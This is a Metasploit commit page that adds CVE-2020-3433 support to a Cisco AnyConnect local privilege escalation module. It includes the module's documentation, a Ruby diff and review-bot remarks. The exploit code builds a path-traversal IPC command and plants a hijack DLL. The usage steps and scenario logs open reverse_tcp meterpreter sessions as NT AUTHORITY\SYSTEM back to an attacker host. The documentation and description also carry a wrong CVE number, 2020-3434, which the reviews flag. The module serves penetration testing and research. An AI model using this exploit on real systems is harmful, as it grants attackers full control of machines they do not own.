Land #14187, Added CVE-2020-3433 module

Merge branch 'land-14187' into upstream-master
This commit is contained in:
bwatters 2020-09-29 13:41:33 -05:00
commit 3aeeede4a6
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
3 changed files with 287 additions and 178 deletions

View File

@ -0,0 +1,224 @@
## Vulnerable Application
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.
Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (`vpndownloader`), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
location `vpndownloader` will be copied to get code execution with system
privileges.
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.
## Install the Application
1. Unzip the AnyConnect package
2. Open the extracted folder
3. Run `Setup.exe`
4. Select `Core & VPN` only (no need to install the full package)
5. Click `Install Selected`
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
7. Accept the EULA (click `Accept`)
8. `Installation complete` (click `OK`)... enjoy
Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
follow the installation steps with the default options.
## Verification Steps
1. Start msfconsole
2. Get a session with non-administrative privileges
3. Do: ```use exploit/windows/local/anyconnect_lpe```
4. Do: ```set SESSION <SESSION>```
5. Do: ```set payload windows/meterpreter/reverse_tcp```
6. Do: ```set LHOST <LHOST>```
7. Do: ```set LPORT <LPORT>```
8. Do: ```check```
9. Do: ```run```
10. You should get a new session as the SYSTEM user
## Options
### INSTALL_PATH
Set Cisco AnyConnect Secure Mobility Client installation path (where
`vpndownloader.exe`should be found). It will be automatically detectedif not set.
### CVE
Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.
### ForceExploit
Set this to `true` to override the `check` result during exploitation.
## Scenarios
### Windows 10 version 1909 (x64) with AnyConnect 4.8.3052 - CVE-2020-3433
```
msf5 exploit(windows/local/anyconnect_lpe) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433
CVE => CVE-2020-3433
msf5 exploit(windows/local/anyconnect_lpe) > check
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run
[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
[*] "-ipc" argument needed
[*] Creating directory C:\Users\ATGO\AppData\Local\Temp\16Nkpr
[*] Meterpreter Session
[*] C:\Users\ATGO\AppData\Local\Temp\16Nkpr created
[*] Writing the payload to C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=76731 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 288 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 3 opened (192.168.1.24:4445 -> 192.168.1.20:44712) at 2020-09-01 14:12:05 +0200
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : W
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : fr_FR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3153
```
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153
cve => CVE-2020-3153
msf5 exploit(windows/local/anyconnect_lpe) > check
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run
[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=29278 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\iZnG\iZnG\iZnG\iZnG\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 270 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 5 opened (192.168.1.24:4445 -> 192.168.1.20:45098) at 2020-09-01 14:23:13 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ATGO-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3433
```
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433
cve => CVE-2020-3433
msf5 exploit(windows/local/anyconnect_lpe) > check
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run
[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument needed
[*] Creating directory C:\Users\atgo\AppData\Local\Temp\fPTN4o
[*] Meterpreter Session
[*] C:\Users\atgo\AppData\Local\Temp\fPTN4o created
[*] Writing the payload to C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=88243 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 288 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 6 opened (192.168.1.24:4445 -> 192.168.1.20:45102) at 2020-09-01 14:24:48 +0200
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ATGO-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
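Review bot: The "Vulnerable Application" text has a wrong CVE number and a few typos that should be fixed before this documentation lands. "the CVE-2020-3434 exploit has been successfully tested" should read CVE-2020-3433 (the identifier used everywhere else in the file and in the module references); "with with system level privileges" doubles a word; "Both attacks consist in sending" should be "consist of sending"; and under INSTALL_PATH, "`vpndownloader.exe`should be found" and "automatically detectedif not set" are missing spaces. It would also help readers of the CVE option section to state explicitly that CVE-2020-3153 only applies to versions below 4.8.02042, which is exactly what the `check` output in the scenarios shows ("4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433)" versus "4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433)").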

View File

@ -1,148 +0,0 @@
## Vulnerable Application
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations as the SYSTEM user.
The attack consists of sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed as the SYSTEM user. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` is copied to get code execution as the
SYSTEM user.
This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).
AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.
## Install the Application
1. Unzip the AnyConnect package
2. Open the extracted folder
3. Run `Setup.exe`
4. Select `Core & VPN` only (no need to install the full package)
5. Click `Install Selected`
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
7. Accept the EULA (click `Accept`)
8. `Installation complete` (click `OK`)... enjoy
Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
follow the installation steps with the default options.
## Verification Steps
1. Start msfconsole
2. Get a session with non-administrative privileges
3. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
4. Do: ```set SESSION <SESSION>```
5. Do: ```set payload windows/meterpreter/reverse_tcp```
6. Do: ```set LHOST <LHOST>```
7. Do: ```set LPORT <LPORT>```
8. Do: ```check```
9. Do: ```run```
10. You should get a new session as the SYSTEM user
## Options
### ForceExploit
Set this to `true` to override the `check` result during exploitation.
## Scenarios
### Windows 10 version 1909 (x64) with AnyConnect 4.7.4056
```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
SESSION => 8
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
[*] Started reverse TCP handler on 172.16.60.1:4445
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=18201 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 270 bytes)
[*] Sending stage (176195 bytes) to 172.16.60.202
[*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-UUQE0B4
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 SP1 (x86) with AnyConnect 4.5.5030
```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
SESSION => 8
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
[*] Started reverse TCP handler on 172.16.60.1:4445
[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
[*] "-ipc" argument not needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 247 bytes)
[*] Sending stage (176195 bytes) to 172.16.60.134
[*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN7-DEV
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
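Review bot: Deleting this file together with the module rename from `exploit/windows/local/anyconnect_path_traversal_lpe` to `exploit/windows/local/anyconnect_lpe` (the new documentation's verification steps use the new name) means any existing reference to the old module path stops resolving. If the old module file is being removed rather than kept as an alias, consider using the framework's `Msf::Module::Deprecated` mixin with `moved_from 'exploit/windows/local/anyconnect_path_traversal_lpe'` on the new module so users of the old name get a pointer to the new one instead of a "failed to load" error.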

View File

@ -16,31 +16,39 @@ class MetasploitModule < Msf::Exploit::Local
super(
update_info(
info,
'Name' => 'Cisco AnyConnect Priv Esc through Path Traversal',
'Name' => 'Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)',
'Description' => %q{
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.
The attack consists in sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed with system privileges. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` will be copied to get code execution with
system privileges.
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.
This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).
Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (`vpndownloader`), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
location `vpndownloader` will be copied to get code execution with system
privileges.
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yorick Koster', # original PoC, analysis
'Antoine Goichot (ATGO)', # PoC
'Christophe De La Fuente' # msf module
'Yorick Koster', # original PoC CVE-2020-3153, analysis
'Antoine Goichot (ATGO)', # PoC CVE-2020-3153, original PoC for CVE-2020-3433, update of msf module
'Christophe De La Fuente' # msf module for CVE-2020-3153
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
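Review bot: The updated `Description` repeats the wrong CVE number from the docs: "the CVE-2020-3434 exploit has been successfully tested" should be CVE-2020-3433, matching the `['CVE', '2020-3433']` reference and the `CVE` option values. Same hunk, "with with system level privileges" doubles a word and "Both attacks consist in sending" should be "consist of sending". These strings are shown to every user on `info`, so they are worth correcting here rather than only in the markdown.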
@ -58,9 +66,11 @@ class MetasploitModule < Msf::Exploit::Local
[
['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
['CVE', '2020-3153']
['CVE', '2020-3153'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW'],
['CVE', '2020-3433']
],
'DisclosureDate' => 'Feb 19 2020',
'DisclosureDate' => 'Aug 05 2020',
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
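Review bot: `DisclosureDate` moves from 'Feb 19 2020' to 'Aug 05 2020', but the module still exploits CVE-2020-3153, which the first reference (the SSD advisory) dates to February. With two vulnerabilities in one module, either keep the earlier disclosure date, since that is when a vulnerability covered by this module first became public, or leave a one-line comment stating that the date refers to CVE-2020-3433 so the choice is not mistaken for a drift.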
@ -74,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Local
false,
'Cisco AnyConnect Secure Mobility Client installation path (where \'vpndownloader.exe\''\
' should be found). It will be automatically detected if not set.'
])
]),
OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-3433', ['CVE-2020-3433', 'CVE-2020-3153']])
]
register_advanced_options [
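Review bot: The `OptEnum` description 'Vulnerability to use' does not tell the user why 'CVE-2020-3433' is the default or when 'CVE-2020-3153' is the right choice. A description such as 'Vulnerability to use (CVE-2020-3153 only applies to versions below 4.8.02042)' would make the option self-explanatory, and the surrounding bracket spacing (`[ true, ...]` next to `['CVE-2020-3433', ...]`) is inconsistent with the style of the `register_options` block above it.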
@ -163,12 +174,19 @@ class MetasploitModule < Msf::Exploit::Local
return CheckCode.Unknown('Unable to retrieve vpndownloader.exe file version')
end
patched_version = Gem::Version.new('4.8.02042')
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')
patched_version_cve_2020_3153 = Gem::Version.new('4.8.02042')
patched_version_cve_2020_3433 = Gem::Version.new('4.9.00086')
@ac_version = Gem::Version.new(version.join('.'))
if @ac_version < patched_version
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version}.")
if @ac_version < patched_version_cve_2020_3153
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3153} (CVE-2020-3153 & CVE-2020-3433).")
elsif (@ac_version < patched_version_cve_2020_3433) && !cve_2020_3153
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3433} (CVE-2020-3433).")
elsif (@ac_version < patched_version_cve_2020_3433) && cve_2020_3153
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3153} (However CVE-2020-3433 can be used).")
else
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version}.")
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3433}.")
end
end
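Review bot: `cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')` is computed here and again in `exploit` (see the later hunk); a small predicate method, e.g. `def cve_2020_3153?; datastore['CVE'] == 'CVE-2020-3153'; end`, would keep both in sync if the option name or values change. The two `elsif` branches both test `@ac_version < patched_version_cve_2020_3433` and differ only on the selected CVE, so nesting them as one `elsif @ac_version < patched_version_cve_2020_3433` with an inner `if cve_2020_3153` check would read more clearly and make it obvious that the `Safe` result in the third branch is deliberate (wrong CVE chosen, not an unpatched-version miss). The logic itself looks right: below 4.8.02042 both vulnerabilities are reported, between 4.8.02042 and 4.9.00086 only CVE-2020-3433 is usable, and the message in the third branch correctly points the user at it.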
@ -198,8 +216,18 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status('"-ipc" argument not needed')
end
program_data_path = get_env('ProgramData')
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')
if cve_2020_3153
program_data_path = get_env('ProgramData')
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
else
temp_path = get_env('TEMP')
junk = Rex::Text.rand_text_alphanumeric(6)
temp_path << "\\#{junk}"
mkdir(temp_path)
dbghelp_path = "#{temp_path}\\dbghelp.dll"
end
print_status("Writing the payload to #{dbghelp_path}")
begin
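Review bot: In the CVE-2020-3433 branch the result of `mkdir(temp_path)` is not checked, and `get_env('TEMP')` returning nil would turn `temp_path << "\\#{junk}"` into a `NoMethodError` rather than a clean `fail_with`. Suggest building the path without mutating the returned string (`temp_path = "#{get_env('TEMP')}\\#{junk}"`), failing with `Failure::Unknown` if the environment lookup or the `mkdir` fails, and, unless it is done outside this hunk, registering the new directory with `register_dir_for_cleanup(temp_path)` so the "[+] Deleted ...\16Nkpr" line shown in the documentation is guaranteed by the code rather than incidental.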
@ -210,12 +238,17 @@ class MetasploitModule < Msf::Exploit::Local
fail_with(Failure::NotFound, e.message)
end
# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
# normal process will copy the file to
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
junk = Rex::Text.rand_text_alphanumeric(4)
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
if cve_2020_3153
# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
# normal process will copy the file to
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
junk = Rex::Text.rand_text_alphanumeric(4)
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
else
cac_cmd << "\t#{@installation_path}\\vpndownloader.exe\t#{dbghelp_path}\""
end
vprint_status("IPC Command: #{cac_cmd}")
cipc_msg = CIPCMessage.new
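Review bot: The `else` branch (`cac_cmd << "\t#{@installation_path}\\vpndownloader.exe\t#{dbghelp_path}\""`) has no comment, while the CVE-2020-3153 branch keeps its three-line explanation of where `vpndownloader.exe` ends up. Add a matching comment stating that for CVE-2020-3433 the genuine `vpndownloader.exe` is launched and the second tab-separated argument is the user-controlled `dbghelp.dll` path it will load, so a later reader understands why no path traversal is needed here and why `dbghelp_path` (not `program_data_path`) is the file that matters in this branch. Since `program_data_path` is only assigned inside the earlier `if cve_2020_3153` block, it is also worth a short comment that `register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")` relies on that same guard.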